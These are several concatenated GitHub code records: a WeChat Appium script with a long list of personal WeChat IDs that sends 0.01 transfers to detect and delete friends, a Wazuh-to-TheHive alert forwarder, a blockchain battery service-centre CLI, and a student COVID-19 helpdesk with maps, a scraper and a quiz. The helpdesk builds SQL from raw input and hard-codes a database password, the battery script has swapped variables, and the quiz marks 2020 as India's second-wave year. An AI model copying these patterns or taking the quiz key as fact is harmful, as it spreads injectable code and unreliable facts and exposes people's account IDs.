wxid_vobbwehmbu9321', '微信号: xP_0128', '微信号: am879701633',\n '微信号: w594721591', '微信号: xlmlyc1027', '微信号: lms20141128', '微信号: CQY1002559385', '微信号: xinyi071030',\n '微信号: XIN5_1', '微信号: wiX_rgstnoih6axb21', '微信号: wjdxj843941744', '微信号: JungHuang1996', '微信号: baozhilin6789',\n '微信号: sp401957112', '微信号: HTH861', '微信号: w635333971', '微信号: huimouyixiao5520', '微信号: xiamiya-',\n '微信号: zh1634865852', '微信号: wxid_0wdnyog2a52i22', '微信号: wxid_rrk8k3u51nkq22', '微信号: qhj17876656745',\n '微信号: chunyanz1127', '微信号: abc291887441', '微信号: wxid_8dyvg2szs4qj22', '微信号: YB50JY8', '微信号: hzy6-6',\n '微信号: wxid_ns9gyk1k2qyd22', '微信号: Nuo77c', '微信号: Caijianming201758', '微信号: ainiyisi_001',\n '微信号: wxid_vyu64ig05xxe21', '微信号: zs15224626211', '微信号: mjcy1314com', '微信号: hygfs12345678',\n '微信号: A15220332697', '微信号: wxid_4s8c25flcao422', '微信号: yesweitinglin', '微信号: wxid_om1k1yii3utn22',\n '微信号: W996442281', '微信号: DJ15766562755', '微信号: W134999999', '微信号: hyj2392651463', '微信号: A18377355183',\n '微信号: chun791777195', '微信号: AA1550940501', '微信号: wxid_tdyj2pr5rp3u22', '微信号: HMc13424228080',\n '微信号: zhj703007739', '微信号: wxid_y3htn44zery022', '微信号: a15676565238', '微信号: wxid_vbi0q8i1kgjk22',\n '微信号: HMD10085', '微信号: wxid_ceujtqqtfah222', '微信号: wxid_9bp5vlxp89j422', '微信号: lzhui52168', '微信号: rvc668',\n '微信号: yaocai12', '微信号: wxid_myc8s8zzfyq222', '微信号: wxg13420080209', '微信号: wxid_1egdr8snu0cz22',\n '微信号: q296496345', '微信号: qq18078276807', '微信号: luo1141404975', '微信号: T96866558', '微信号: xf19980507',\n '微信号: wei623757432', '微信号: wxid_kdrmn1fbqrxe22', '微信号: lxx19978313889', '微信号: wxid_8wrwfmwnya7z22',\n '微信号: a13480996516', '微信号: liminx93p11', '微信号: zhi168866', '微信号: qwe15878290791', '微信号: vs644311324',\n '微信号: zhuzhuxia20190717', '微信号: ly464031711', '微信号: wxid_5l4s3sksd4gt22', '微信号: wxid_3e4op8jmxivf22',\n '微信号: aa13667722906', '微信号: H15977250087', '微信号: jiaqi_00323', '微信号: wxid_at4kfrv5zz9022',\n '微信号: zhouyong_466350531', '微信号: Yul-789', '微信号: wxid_wh8te7g1s8ju22', '微信号: A9sv888',\n '微信号: wxid_ewkyrbo6xs4x22', '微信号: wxid_mwhlxp9sxuxr22', '微信号: wxid_yo66nnhzlm7s22', '微信号: fei18878297940',\n '微信号: mm18778204248', '微信号: tyhbjijiubnook', '微信号: w18378207968', '微信号: Syoo88168', '微信号: QF1273688177',\n '微信号: x131188900', '微信号: yjhd201117', '微信号: wxid_nbzyjnuttazg22', '微信号: BTC20200607', '微信号: ruii925017',\n '微信号: wxid_l6iuqa8i56a022', '微信号: lianying116688', '微信号: Tommy2016', '微信号: pan1102296432',\n '微信号: Oyj18278224101', '微信号: wangxiaoli911230', '微信号: Amn98oo', '微信号: wdj768', '微信号: aaa13667800788']\ndriver = webdriver.Remote(\"http://localhost:4723/wd/hub\", desired_caps)\nwait = WebDriverWait(driver, 3000)\nfor yy in range(len(ll)):\n ss = ll[yy]\n num = re.findall('[0-9a-zA-Z_]+', ss)\n print(num)\n wait.until(EC.element_to_be_clickable((By.ID, \"com.tencent.mm:id/he6\"))).click()\n time.sleep(1.5)\n print('sendkeys')\n wait.until(EC.element_to_be_clickable((By.ID, \"com.tencent.mm:id/bxz\"))).click()\n print('click')\n wait.until(EC.element_to_be_clickable((By.ID, \"com.tencent.mm:id/bxz\"))).send_keys(num)\n print('sendover')\n # driver.find_element_by_id(\"com.tencent.mm:id/bxz\").send_keys(num)\n wait.until(EC.element_to_be_clickable((By.ID, \"com.tencent.mm:id/bn6\"))).click()\n wait.until(EC.element_to_be_clickable((By.ID, \"com.tencent.mm:id/au0\"))).click()\n time.sleep(1)\n driver.find_elements_by_id('com.tencent.mm:id/rs')[5].click()\n # hb=driver.find_element_by_id('com.tencent.mm:id/rs')[5].get_attribute('name')\n # print(hb)\n time.sleep(1.5)\n driver.find_element_by_id('com.tencent.mm:id/jf4').send_keys('0.01')\n time.sleep(0.5)\n wait.until(EC.element_to_be_clickable((By.ID, \"com.tencent.mm:id/e6c\"))).click() # 点击转账\n name1 = wait.until(EC.element_to_be_clickable((By.ID, \"com.tencent.mm:id/ffh\"))).get_attribute('name')\n time.sleep(0.5)\n if name1 == nr or name1 == nr2:\n wait.until(EC.element_to_be_clickable((By.ID, \"com.tencent.mm:id/ffp\"))).click() # 点击知道了\n wait.until(EC.element_to_be_clickable((By.ID, \"com.tencent.mm:id/ei\"))).click() # 点击返回按钮\n wait.until(EC.element_to_be_clickable((By.ID, \"com.tencent.mm:id/d8\"))).click() # 点击右上角 ...\n time.sleep(0.5)\n wait.until(EC.element_to_be_clickable((By.ID, \"com.tencent.mm:id/h8t\"))).click() # 点击头像\n wait.until(EC.element_to_be_clickable((By.ID, \"com.tencent.mm:id/d8\"))).click() # 点击右上角 ...\n wait.until(EC.element_to_be_clickable((By.ID, \"com.tencent.mm:id/ijq\"))).click() # 点击删除\n time.sleep(1)\n driver.find_elements_by_id('com.tencent.mm:id/ffp')[1].click() # 点击确定删除\n time.sleep(1)\n elif name1 == nr:\n pass\n\nprint(len(ll))\n","repo_name":"weiyuanhui520/learning","sub_path":"delete_friend04.py","file_name":"delete_friend04.py","file_ext":"py","file_size_in_byte":6910,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"3037497689","text":"#!/bin/python3\n\nimport os\nimport json\nimport sys\nimport logging\nimport requests\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n################################################## Global variables ##################################################\n\nalert_file = open(sys.argv[1])\napi_key = sys.argv[2]\nhook_url = sys.argv[3]\nalert_json = json.loads(alert_file.read())\nalert_file.close()\n\nlog_file = \"/var/ossec/logs/integrations.log\"\nDEBUG = False\n\n################################################## Common functions ##################################################\n\n# Enables logging and configure it\ndef set_logger(name, logfile=None):\n hostname = os.uname()[1]\n format = '%(asctime)s {0} {1}: [%(levelname)s] %(message)s'.format(hostname, name)\n formatter = logging.Formatter(format)\n if DEBUG:\n logging.getLogger('').setLevel(logging.DEBUG)\n else:\n logging.getLogger('').setLevel(logging.INFO)\n\n streamHandler = logging.StreamHandler(sys.stdout)\n streamHandler.setFormatter(formatter)\n logging.getLogger('').addHandler(streamHandler)\n \n if logfile:\n fileHandler = logging.FileHandler(logfile)\n fileHandler.setFormatter(formatter)\n logging.getLogger('').addHandler(fileHandler)\n\n# Write the body of the TheHive Alert\ndef build_alert(wazuh_alert):\n try:\n description = \"An alert with rule id \"+str(wazuh_alert['rule']['id'])+\" and level \"+str(wazuh_alert['rule']['level'])+\" has been triggered\"\n severity = wazuh_alert['rule']['level'] // 4\n if severity < 1:\n severity = 1\n alert = { \"title\": wazuh_alert['rule']['description'],\n \"description\": description,\n \"type\": \"external\",\n \"source\": wazuh_alert['manager']['name'],\n \"sourceRef\": \"id: {}\".format(wazuh_alert['id']),\n \"tags\": wazuh_alert['rule']['groups'],\n \"severity\": severity,\n \"tlp\": severity - 1}\n except Exception as e:\n exc = sys.exc_info()\n logging.error(\"Error while writing the alert: [{}] {}\".format(exc[2].tb_lineno, e))\n sys.exit(1)\n return alert\n\ndef send_thehive(url, api, msg):\n headers = { \"content-type\": \"application/json\", \n \"Authorization\": \"Bearer {}\".format(api) }\n data = json.dumps(msg)\n try:\n logging.debug(\"Sending alert {}.\".format(data))\n result = requests.post(url, data=data, headers=headers)\n if result.status_code != 201:\n raise Exception(\"Code {} - {}\".format(result.status_code, result.text))\n except Exception as e:\n exc = sys.exc_info()\n logging.error(\"Error while contacting TheHive: [{}] {}\".format(exc[2].tb_lineno, e))\n sys.exit(1)\n return result.text\n\n################################################## Main Workflow ##################################################\nif __name__ == \"__main__\":\n set_logger(\"thehive-integration\", log_file)\n \n logging.debug(\"Starting TheHive Integration\")\n body = build_alert(alert_json)\n logging.debug(\"Alert building process completed successfully: {}\".format(body))\n response = send_thehive(hook_url, api_key, body)\n resp_dict = json.loads(response)\n logging.info(\"Alert sent to TheHive server. Response ID: {}\".format(resp_dict[\"id\"]))","repo_name":"dariommr/scripts","sub_path":"wazuh-integrations/TheHive/custom-thehive-simple.py","file_name":"custom-thehive-simple.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"34761407450","text":"import sys, os\nimport argparse\nimport web3\nfrom web3 import Web3\nfrom web3.middleware import geth_poa_middleware\n\n# Project modules\nimport utils\nfrom TextColor.color import bcolors\n\n\nURL = \"http://127.0.0.1:8545\"\n\nMGMT_CONTRACT_DB_NAME = utils.MGMT_CONTRACT_DB_NAME\nMGMT_CONTRACT_SRC_PATH = utils.MGMT_CONTRACT_SRC_PATH\nMGMT_CONTRACT_NAME = utils.MGMT_CONTRACT_NAME\nREGISTRATION_REQUIRED_GAS = utils.REGISTRATION_REQUIRED_GAS\nACCOUNT_DB_NAME = 'scenter.json'\n\ndef create_parser() -> argparse.ArgumentParser:\n \"\"\"\n Create cli argument parser\n\n :return: Parser\n :rtype: argparse.ArgumentParser\n \"\"\"\n\n parser = argparse.ArgumentParser(\n description='Service provider tool',\n epilog=\"\"\"\n It is expected that Web3 provider specified by WEB3_PROVIDER_URI\n environment variable. E.g.\n WEB3_PROVIDER_URI=file:///path/to/node/rpc-json/file.ipc\n WEB3_PROVIDER_URI=http://192.168.1.2:8545\n \"\"\"\n )\n\n parser.add_argument(\n '--new', type=str, required=False,\n help='Add new service scenter account'\n )\n\n parser.add_argument(\n '--reg', action='store_true', required=False,\n help='Register service scenter in the chain'\n )\n\n parser.add_argument(\n '--verify', type=str, required=False,\n help='Verify battery'\n )\n\n parser.add_argument(\n '--approve_replacement', nargs=3, required=False,\n help=\"Battery replacement \"\n )\n\n parser.add_argument(\n '--get_address', action='store_true', required=False,\n help='Get address of service center'\n )\n\n parser.add_argument(\n '--transfer_battery_to_car', nargs=3, required=False,\n help='Transfer battery to the car '\n )\n\n return parser\n\n\ndef register_scenter(_w3: Web3):\n \"\"\"\n Register new service center\n\n :param Web3 _w3: Web3 instance\n :return: Registration status message\n :rtype: str\n \"\"\"\n\n mgmt_contract = utils.init_management_contract(_w3)\n data = utils.open_data_base(ACCOUNT_DB_NAME)\n\n if data is None:\n sys.exit(f\"{bcolors.FAIL}Cannot access account database{bcolors.ENDC}\")\n \n actor = data['account']\n\n tx = {'from': actor, 'gasPrice': utils.get_actual_gas_price(_w3)}\n\n if REGISTRATION_REQUIRED_GAS * tx['gasPrice'] > _w3.eth.getBalance(actor):\n sys.exit(f\"{bcolors.FAIL}No enough funds to send transaction{bcolors.ENDC}\")\n \n utils.unlock_account(_w3, actor, data['password'])\n\n try:\n tx_hash = mgmt_contract.functions.registerServiceCenter().transact(tx)\n except ValueError:\n sys.exit(f\"{bcolors.FAIL}Already registered{bcolors.ENDC}\")\n\n receipt = web3.eth.wait_for_transaction_receipt(_w3, tx_hash, 120, 0.1)\n\n if receipt.status == 1:\n return f\"{bcolors.OKGREEN}Registered successfully{bcolors.ENDC}\"\n \n else:\n return f\"{bcolors.FAIL}Registration failed{bcolors.ENDC}\"\n\n\ndef approve_replacement(w3: Web3, car_battery_id: str, sc_battery_id: str, car_address: str) -> None:\n \"\"\"\n Approve battery replacement if battery is successfully verified\n Create a json file with approval stutus and maybe error\n\n :param Web3 w3: Web3 instance\n :param str car_battery_id: Car's battery id\n :param str sc_battery_id: Service center's battery id\n :param str car_address: Car's address\n\n :return: Nothing\n :rtype: None\n \"\"\"\n\n sc_battery_id_path = f\"firmware/{car_battery_id[:8]}.py\"\n car_battery_id_path = f\"firmware/{sc_battery_id[:8]}.py\"\n\n data = utils.verify_battery(w3, car_battery_id_path)\n message = {'approved': False}\n\n if data[0]:\n message['approved'] = True\n \n message['error'] = \"Car's battery probably is fake\"\n\n utils.write_data_base(message, 'replacement.json')\n \n\ndef get_addr() -> str:\n \"\"\"\n Get service center's address\n\n :return: Service center's address\n :rtype: str \n \"\"\"\n\n data = utils.open_data_base(ACCOUNT_DB_NAME)\n return data['account']\n\n\ndef get_work_cost(car_battery_id: str, sc_battery_id: str) -> float:\n \"\"\"\n Calculate the cost of battery replacement based on its characteristics\n\n :param str car_battery_id: Car's battery id\n :param str sc_battery_id: Service center's battery id\n\n return: Cost of replacement\n rtype: float\n \"\"\"\n\n return 0.005\n\n\ndef transfer_battery_to_car(w3: Web3, car_account: str, car_battery_id: str, sc_battery_id) -> float:\n \"\"\"\n Transfer battery to car\n\n :param Web3 w3: Web3 instance\n :param str car_account: Car's address\n :param str car_battery_id: Car's battery id\n :param str sc_battery_id: Service centers's battery id\n\n return: Cost of battery replacement\n rtype: float\n \"\"\"\n\n result = utils.change_owner(w3, sc_battery_id, car_account, ACCOUNT_DB_NAME)\n\n if 'failed' in result:\n sys.exit(f\"{bcolors.FAIL}Service center does not own this battery!{bcolors.ENDC}\")\n\n return get_work_cost(car_battery_id, sc_battery_id)\n\n\ndef main() -> None:\n w3 = Web3(Web3.HTTPProvider(URL))\n\n # configure provider to work with PoA chains\n w3.middleware_onion.inject(geth_poa_middleware, layer=0)\n\n parser = create_parser()\n args = parser.parse_args()\n\n if args.new:\n print(utils.create_new_account(w3, args.new, ACCOUNT_DB_NAME))\n \n elif args.reg:\n print(register_scenter(w3))\n \n elif args.verify:\n data = utils.verify_battery(w3, args.verify)\n print(f\"Verified: {data[0]}\")\n print(f\"Total charges: {data[1]}\")\n print(f\"Vendor id: {data[2]}\")\n print(f\"Vendor name: {data[3]}\")\n\n elif args.approve_replacement:\n approve_replacement(w3, args.approve_replacement[0], args.approve_replacement[1], args.approve_replacement[2])\n \n elif args.get_address:\n print(get_addr())\n\n elif args.transfer_battery_to_car:\n print(transfer_battery_to_car(w3, args.transfer_battery_to_car[0], args.transfer_battery_to_car[1], args.transfer_battery_to_car[2]))\n\n else:\n sys.exit(f\"{bcolors.FAIL}No parameters provided{bcolors.ENDC}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"acid9reen/bas","sub_path":"scenter.py","file_name":"scenter.py","file_ext":"py","file_size_in_byte":6214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"38107221444","text":"import mysql.connector \r\nimport plotly.express as px\r\nimport datetime\r\nimport plotly\r\nimport pandas as pd\r\nimport requests \r\nfrom bs4 import BeautifulSoup\r\nimport plyer\r\nfrom tkinter import *\r\nfrom tkinter import messagebox,filedialog\r\ncon=mysql.connector.connect(host=\"localhost\",user=\"root\",password='root',database='surendran')\r\ncur=con.cursor()\r\nn=5\r\ndef Map():\r\n covids='https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv' \r\n covs='C:/Users/Admin/Documents/Documents/summarymohfw1updated.csv'\r\n print(\"###################\")\r\n print(\" COVID-19 MAPPING\")\r\n print(\"###################\")\r\n print(\"Which type of map would you like to view?\")\r\n print(\"1. Worldwide\")\r\n print(\"2. Statewise\")\r\n print(\"3. Both\")\r\n ch=int(input(\"Enter your choice:\"))\r\n df=pd.read_csv(covids)\r\n db=pd.read_csv(covs)\r\n da=datetime.datetime.now()\r\n def WorWid():\r\n fig=px.density_mapbox(df,lat='Lat',lon='Long',z=h,radius=30,center=dict(lat=9,lon=9),\r\n zoom=3,opacity=0.8,hover_name=h,\r\n color_continuous_scale=px.colors.diverging.BrBG,\r\n mapbox_style='stamen-terrain',\r\n title='Covid-19 Mapping(22/1/20-The Day Before Present)(Worldwide)')\r\n fig.show() \r\n plotly.offline.plot(fig,filename='E:\\map_exp.html',auto_open=True)\r\n def StatWid():\r\n fin=px.density_mapbox(db,lat='Lat',lon='Long',z=p,radius=30,center=dict(lat=9,lon=9),\r\n zoom=3,opacity=0.8,hover_name=p,hover_data=['States/Uts'],\r\n color_continuous_scale=px.colors.diverging.BrBG,\r\n mapbox_style='stamen-terrain',\r\n title='Covid-19 Mapping(Statewise)(New cases)')\r\n fin.show() \r\n plotly.offline.plot(fin,filename='E:\\map_exxp.html',auto_open=True)\r\n if ch==1:\r\n print(\"To display Covid-19 map(Worldwide):-\")\r\n print(\"Enter according to the range:22/1/20-the day before present(\",\r\n da.strftime(\"%d-%m-%y\"),\")\")\r\n print(\"Enter the day:\",end=\"\")\r\n d=int(input())\r\n print(\"Enter the month(1-12):\",end=\"\")\r\n m=int(input())\r\n print(\"Enter the year(20-\",da.strftime(\"%y\"),\"):\",end=\"\")\r\n y=int(input())\r\n h=str(m)+'/'+str(d)+'/'+str(y)\r\n WorWid()\r\n elif ch==2:\r\n print(\"To display Covid-19 map(Statewise):-\")\r\n print(\"Enter according to the range:03-01-22 - 16-01-22\")\r\n print(\"Enter the day:\",end=\"\")\r\n dd=int(input())\r\n p='1-'+str(dd)+'-22'\r\n StatWid()\r\n elif ch==3:\r\n print(\"To display Covid-19 map(Worldwide & Statewise):-\")\r\n print(\"Enter according to the range:03-01-22 - 16-01-22\")\r\n print(\"Enter the day:\",end=\"\")\r\n dd=int(input())\r\n h='1/'+str(dd)+'/22'\r\n p='1-'+str(dd)+'-22'\r\n WorWid()\r\n StatWid()\r\n else:\r\n print(\"Oops! This is an uncompatible request\")\r\ndef Graph():\r\n print(\"##############\")\r\n print(\"COVID-19 GRAPH\")\r\n print(\"##############\")\r\n df = pd.read_excel('C:\\protegograph\\protegograph.xlsx')\r\n Place = df['Place']\r\n Cases = df['Cases']\r\n Date = df['Date'].dt.strftime('%Y-%m-%d')\r\n fig = px.bar(df,x=Place,y=Cases,color=Place,animation_frame=Date,animation_group=Place,range_y=[0,8000000])\r\n plotly.offline.plot(fig,filename='protegograph.html')\r\ndef Track():\r\n print(\"###############\")\r\n print(\"COVID-19 TRACKER\")\r\n print(\"###############\")\r\n def datacollected():\r\n def notification(title, message):\r\n plyer.notification.notify(title= title,message= message,timeout = 15)\r\n url = \"https://www.worldometers.info/coronavirus/\"\r\n res = requests.get(url)\r\n soup = BeautifulSoup(res.content,'html.parser') \r\n tbody = soup.find('tbody')\r\n abc = tbody.find_all('tr')\r\n countrynotification = cntdata.get()\r\n if(countrynotification == \"\"):\r\n countrynotification = \"world\"\r\n serial_number,countries , total_cases , new_cases , total_death , new_deaths, total_recovered,active_cases = [],[],[],[],[],[],[],[]\r\n serious_critical , total_cases_permn, total_deaths_permn, total_tests, total_test_permillion, total_pop = [],[],[],[],[],[]\r\n header = ['serial_number','countries' , 'total_cases' , 'new_cases' , 'total_death' , 'new_deaths', 'total_recovered','active_cases',\r\n 'serious_critical' , 'total_cases_permn', 'total_deaths_permn', 'total_tests', 'total_test_permillion', 'total_pop' ]\r\n for i in abc:\r\n id = i.find_all('td')\r\n if(id[1].text.strip().lower() == countrynotification):\r\n totalcases1 = int(id[2].text.strip().replace(',',\"\"))\r\n totaldeath = id[4].text.strip()\r\n newcases = id[3].text.strip()\r\n newdeaths = id[5].text.strip()\r\n notification(\"CORONA RECENT UPDATES OF {}\".format(countrynotification),\"Total Cases : {}\\nTotal Deaths : {}\\nNew Cases : {}\\nNew Deaths : {}\".format(totalcases1,totaldeath,newcases,newdeaths))\r\n serial_number.append(id[0].text.strip())\r\n countries.append(id[1].text.strip())\r\n total_cases.append(id[2].text.strip().replace(',',\"\"))\r\n new_cases.append(id[3].text.strip())\r\n new_deaths.append(id[5].text.strip())\r\n total_death.append(id[4].text.strip())\r\n total_recovered.append(id[6].text.strip())\r\n active_cases.append(id[7].text.strip())\r\n serious_critical.append(id[8].text.strip())\r\n total_cases_permn.append(id[9].text.strip())\r\n total_deaths_permn.append(id[10].text.strip())\r\n total_tests.append(id[11].text.strip())\r\n total_test_permillion.append(id[12].text.strip())\r\n total_pop.append(id[13].text.strip())\r\n dataframe = pd.DataFrame(list(zip(serial_number,countries , total_cases , new_cases , total_death , \r\n new_deaths, total_recovered,active_cases,\r\n serious_critical , total_cases_permn, total_deaths_permn, total_tests, total_test_permillion, \r\n total_pop)),columns=header)\r\n sorts = dataframe.sort_values('total_cases',ascending = False)\r\n for a in flist:\r\n if (a == 'html'):\r\n path2 = '{}/coronadata.html'.format(path)\r\n sorts.to_html(r'{}'.format(path2))\r\n if (a == 'json'):\r\n path2 = '{}/coronadata.json'.format(path)\r\n sorts.to_json(r'{}'.format(path2))\r\n if (a == 'csv'):\r\n path2 = '{}/coronadata.csv'.format(path)\r\n sorts.to_csv(r'{}'.format(path2))\r\n if(len(flist) != 0):\r\n messagebox.showinfo(\"Notification\",\"Corona Record is saved {}\".format(path2),parent =coro)\r\n def downloaddata():\r\n global path\r\n if(len(flist) != 0):\r\n path = filedialog.askdirectory()\r\n else:\r\n pass\r\n datacollected()\r\n flist.clear()\r\n Inhtml.configure(state = 'normal')\r\n Injson.configure(state = 'normal')\r\n Inexcel.configure(state = 'normal')\r\n def inhtmldownload():\r\n flist.append('html')\r\n Inhtml.configure(state = 'disabled')\r\n def injsondownload():\r\n flist.append('json')\r\n Injson.configure(state = 'disabled')\r\n def inexceldownload():\r\n flist.append('csv')\r\n Inexcel.configure(state = 'disabled')\r\n coro = Tk()\r\n coro.title(\"Covid-19 Tracker and Notifications\")\r\n coro.geometry('800x500+200+80')\r\n coro.configure(bg='#556B2F')\r\n flist = []\r\n path = ''\r\n mainlabel = Label(coro,text=\"Corona Virus Live Tracker\",font=(\"new roman\",30,\"italic bold\"), bg = \"#FF8C00\",width=33\r\n ,fg = \"black\",bd=5)\r\n mainlabel.place(x=0,y=0)\r\n label2 = Label(coro,text=\"Download File in \",font=(\"arial\",20,\"italic bold\"), bg = \"#556B2F\")\r\n label2.place(x=15,y=200)\r\n cntdata = StringVar()\r\n entry1 = Entry(coro,textvariable = cntdata ,font = (\"arial\",20,\"italic bold\"), relief = RIDGE,bd = 2 , width = 32)\r\n entry1.place(x = 280, y = 100)\r\n Inhtml = Button(coro,text = \"Html\", bg = \"#2DAE9A\", font = (\"arial\",15,\"italic bold\"),relief = RIDGE,activebackground = \"#05945B\",\r\n activeforeground = \"white\",bd = 5,width = 5,command = inhtmldownload)\r\n Inhtml.place(x = 300, y = 200)\r\n Injson = Button(coro,text = \"json\", bg = \"#2DAE9A\", font = (\"arial\",15,\"italic bold\"),relief = RIDGE,activebackground = \"#05945B\",\r\n activeforeground = \"white\",bd = 5,width = 5,command = injsondownload)\r\n Injson.place(x = 300, y = 260)\r\n Inexcel = Button(coro,text = \"Excel\", bg = \"#2DAE9A\", font = (\"arial\",15,\"italic bold\"),relief = RIDGE,activebackground = \"#05945B\",\r\n activeforeground = \"white\",bd = 5,width = 5,command = inexceldownload )\r\n Inexcel.place(x = 300, y = 320)\r\n Submit = Button(coro,text = \"Submit\", bg = \"#CB054A\", font = (\"arial\",15,\"italic bold\"),relief = RIDGE,activebackground = \"#7B0519\",\r\n activeforeground = \"white\",bd = 5,width = 25,command = downloaddata)\r\n Submit.place(x = 450, y = 260)\r\n coro.mainloop()\r\ndef Quiz():\r\n print(\"################\")\r\n print(\"COVID-19 MCQ QUIZ\")\r\n print(\"################\")\r\n score = 0\r\n answer1 = input (\"Where was Covid-19 first detected? \\na. INDIA \\nb. CHINA \\nc.TURKEY \\nAnswer: \")\r\n if answer1== \"b\" or answer1 ==\"CHINA\":\r\n score += 1\r\n print (\"Correct!\")\r\n print (\"Score: \", score)\r\n print(\"\\n\")\r\n else:\r\n print (\"Incorrect! The answer is CHINA.\")\r\n print (\"Score: \", score)\r\n print (\"\\n\")\r\n answer2= input (\"What can prevent us from Covid-19? \\na. SOCIAL DISTANCING \\nb. WEARING MASK \\nc. ALL OF THESE \\nAnswer: \")\r\n if answer2 == \"c\" or answer2 == \"ALL OF THESE\":\r\n score += 1\r\n print(\"Correct!\")\r\n print (\"Score: \", score)\r\n print(\"\\n\")\r\n else:\r\n print (\"Incorrect! The answer is ALL OF THESE\")\r\n print (\"Score: \", score)\r\n print (\"\\n\")\r\n answer1 = input (\"What is the minimum distance to be kept from each other to avoid COVID-19? \\na. 1-2m \\nb. 5-8m \\nc. 1km \\nAnswer: \")\r\n if answer1== \"a\" or answer1 ==\"1-2m\":\r\n score += 1\r\n print (\"Correct!\")\r\n print (\"Score: \", score)\r\n print(\"\\n\")\r\n else:\r\n print (\"Incorrect! The answer is 1-2m.\")\r\n print (\"Score: \", score)\r\n print (\"\\n\")\r\n answer1 = input (\"For how long should one be quarantine if exposed to COVID-19? \\na. no need to be quarantined \\nb. 14 days \\nc.14 weeks \\nAnswer: \")\r\n if answer1== \"b\" or answer1 ==\"14 days\":\r\n score += 1\r\n print (\"Correct!\")\r\n print (\"Score: \", score)\r\n print(\"\\n\")\r\n else:\r\n print (\"Incorrect! The answer is 14 days.\")\r\n print (\"Score: \", score)\r\n print (\"\\n\")\r\n answer1 = input (\"When was COVID-19 first reported in India? \\na. 2021 \\nb. 2019 \\nc.2020 \\nAnswer: \")\r\n if answer1== \"c\" or answer1 ==\"2020\":\r\n score += 1\r\n print (\"Correct!\")\r\n print (\"Score: \", score)\r\n print(\"\\n\")\r\n else:\r\n print (\"Incorrect! The answer is 2020.\")\r\n print (\"Score: \", score)\r\n print (\"\\n\")\r\n answer1 = input (\"Where was COVID-19 first reported in India? \\na. Delhi \\nb. Kerala \\nc. Maharashtra \\nAnswer: \")\r\n if answer1== \"b\" or answer1 ==\"Kerala\":\r\n score += 1\r\n print (\"Correct!\")\r\n print (\"Score: \", score)\r\n print(\"\\n\")\r\n else:\r\n print (\"Incorrect! The answer is Kerala.\")\r\n print (\"Score: \", score)\r\n print (\"\\n\")\r\n answer1 = input (\"What are the most common symptoms of Covid ? \\na. Fever \\nb.Cough \\nc. both a and b \\nAnswer: \")\r\n if answer1== \"c\" or answer1 ==\"both a and b\":\r\n score += 1\r\n print (\"Correct!\")\r\n print (\"Score: \", score)\r\n print(\"\\n\")\r\n else:\r\n print (\"Incorrect! The answer is both a and b.\")\r\n print (\"Score: \", score)\r\n print (\"\\n\")\r\n answer1 = input (\"Which state mostly had highest number of cases of Covid in India? \\na. Maharashtra \\nb. Tamil Nadu \\nc. Uttar Pradesh \\nAnswer: \")\r\n if answer1== \"a\" or answer1 ==\"Maharashtra\":\r\n score += 1\r\n print (\"Correct!\")\r\n print (\"Score: \", score)\r\n print(\"\\n\")\r\n else:\r\n print (\"Incorrect! The answer is Maharashtra.\")\r\n print (\"Score: \", score)\r\n print (\"\\n\")\r\n answer1 = input (\"When did the 2nd wave of Coronavirus hit in India ? \\na. 2019 \\nb. 2020 \\nc.2021 \\nAnswer: \")\r\n if answer1== \"b\" or answer1 ==\"2020\":\r\n score += 1\r\n print (\"Correct!\")\r\n print (\"Score: \", score)\r\n print(\"\\n\")\r\n else:\r\n print (\"Incorrect! The answer is 2020.\")\r\n print (\"Score: \", score)\r\n print (\"\\n\")\r\n answer1 = input (\"Where was Omicron (Variant of Covid-19) first detected? \\na. South Africa \\nb. India \\nc.China \\nAnswer: \")\r\n if answer1== \"a\" or answer1 ==\"South Africa\":\r\n score += 1\r\n print (\"Correct!\")\r\n print (\"Score: \", score)\r\n print(\"\\n\")\r\n else:\r\n print (\"Incorrect! The answer is South Africa.\")\r\n print (\"Score: \", score)\r\n print (\"\\n\")\r\n answer1 = input (\"Are you fully vaccinated ? \\na. Yes \\nb. No not yet \\nAnswer: \")\r\n if answer1== \"a\" or answer1 ==\"Yes\":\r\n print (\"That's GREAT! You are expected to follow all other Government guidelines too like Social distancing, etc. Keep it up.\")\r\n print(\"\\n\")\r\n else:\r\n print (\"We encourage you to get vaccinated as soon as possible. Your small action can curb the spread. You are also expected to follow all other Government guidelines too like Social distancing, etc.\")\r\n print (\"\\n\")\r\n if score <=5:\r\n print (\"your total score is :\",score,\" -nice try, better luck next time\")\r\n elif score >=6:\r\n print (\"your total score is :\",score,\"- you are doing great!\")\r\nprint(\"#####################\")\r\nprint(\"PROTEGO COVID-19 HELPDESK\")\r\nprint(\"#####################\")\r\nprint(\"1. Register/Forgot your credentials\")\r\nprint(\"2. Login\")\r\nchoice=int(input(\"Enter your choice:\"))\r\nwhile True:\r\n if choice==1:\r\n No=n\r\n Name=input(\"Enter your name:\")\r\n Loginid=input(\"Enter your new 10-digit Login id:\")\r\n password=input(\"Enter your new 6-digit password:\")\r\n query=\"Insert into Log values({},'{}','{}','{}')\".format(No,Name,Loginid,password)\r\n n+=1\r\n cur.execute(query)\r\n con.commit()\r\n print(\"Successfully inserted....!\")\r\n print(\"Now you may login!\")\r\n Log=input(\"Enter the Login Id:\")\r\n pas=input(\"Enter your password:\")\r\n if Loginid==Log and password==pas:\r\n print(\"You have successfully logged in....!\")\r\n print(\"#####################\")\r\n print(\"1. Maps\")\r\n print(\"2. Graphs\")\r\n print(\"3. Tracker\")\r\n print(\"4. Quiz\")\r\n gh=int(input(\"Enter your choice:\"))\r\n if gh==1:\r\n Map()\r\n elif gh==2:\r\n Graph()\r\n elif gh==3:\r\n Track()\r\n elif gh==4:\r\n Quiz()\r\n else:\r\n print(\"Choose from the options\")\r\n poi=\"Y\"\r\n while poi==\"Y\" or poi==\"y\":\r\n poi=input(\"Do you want to view other choices?(Y/N):\")\r\n if poi!=\"Y\" and poi!=\"y\":\r\n print(\"Exiting...\")\r\n print(\"#####################\")\r\n break\r\n print(\"1. Maps\")\r\n print(\"2. Graphs\")\r\n print(\"3. Tracker\")\r\n print(\"4. Quiz\")\r\n 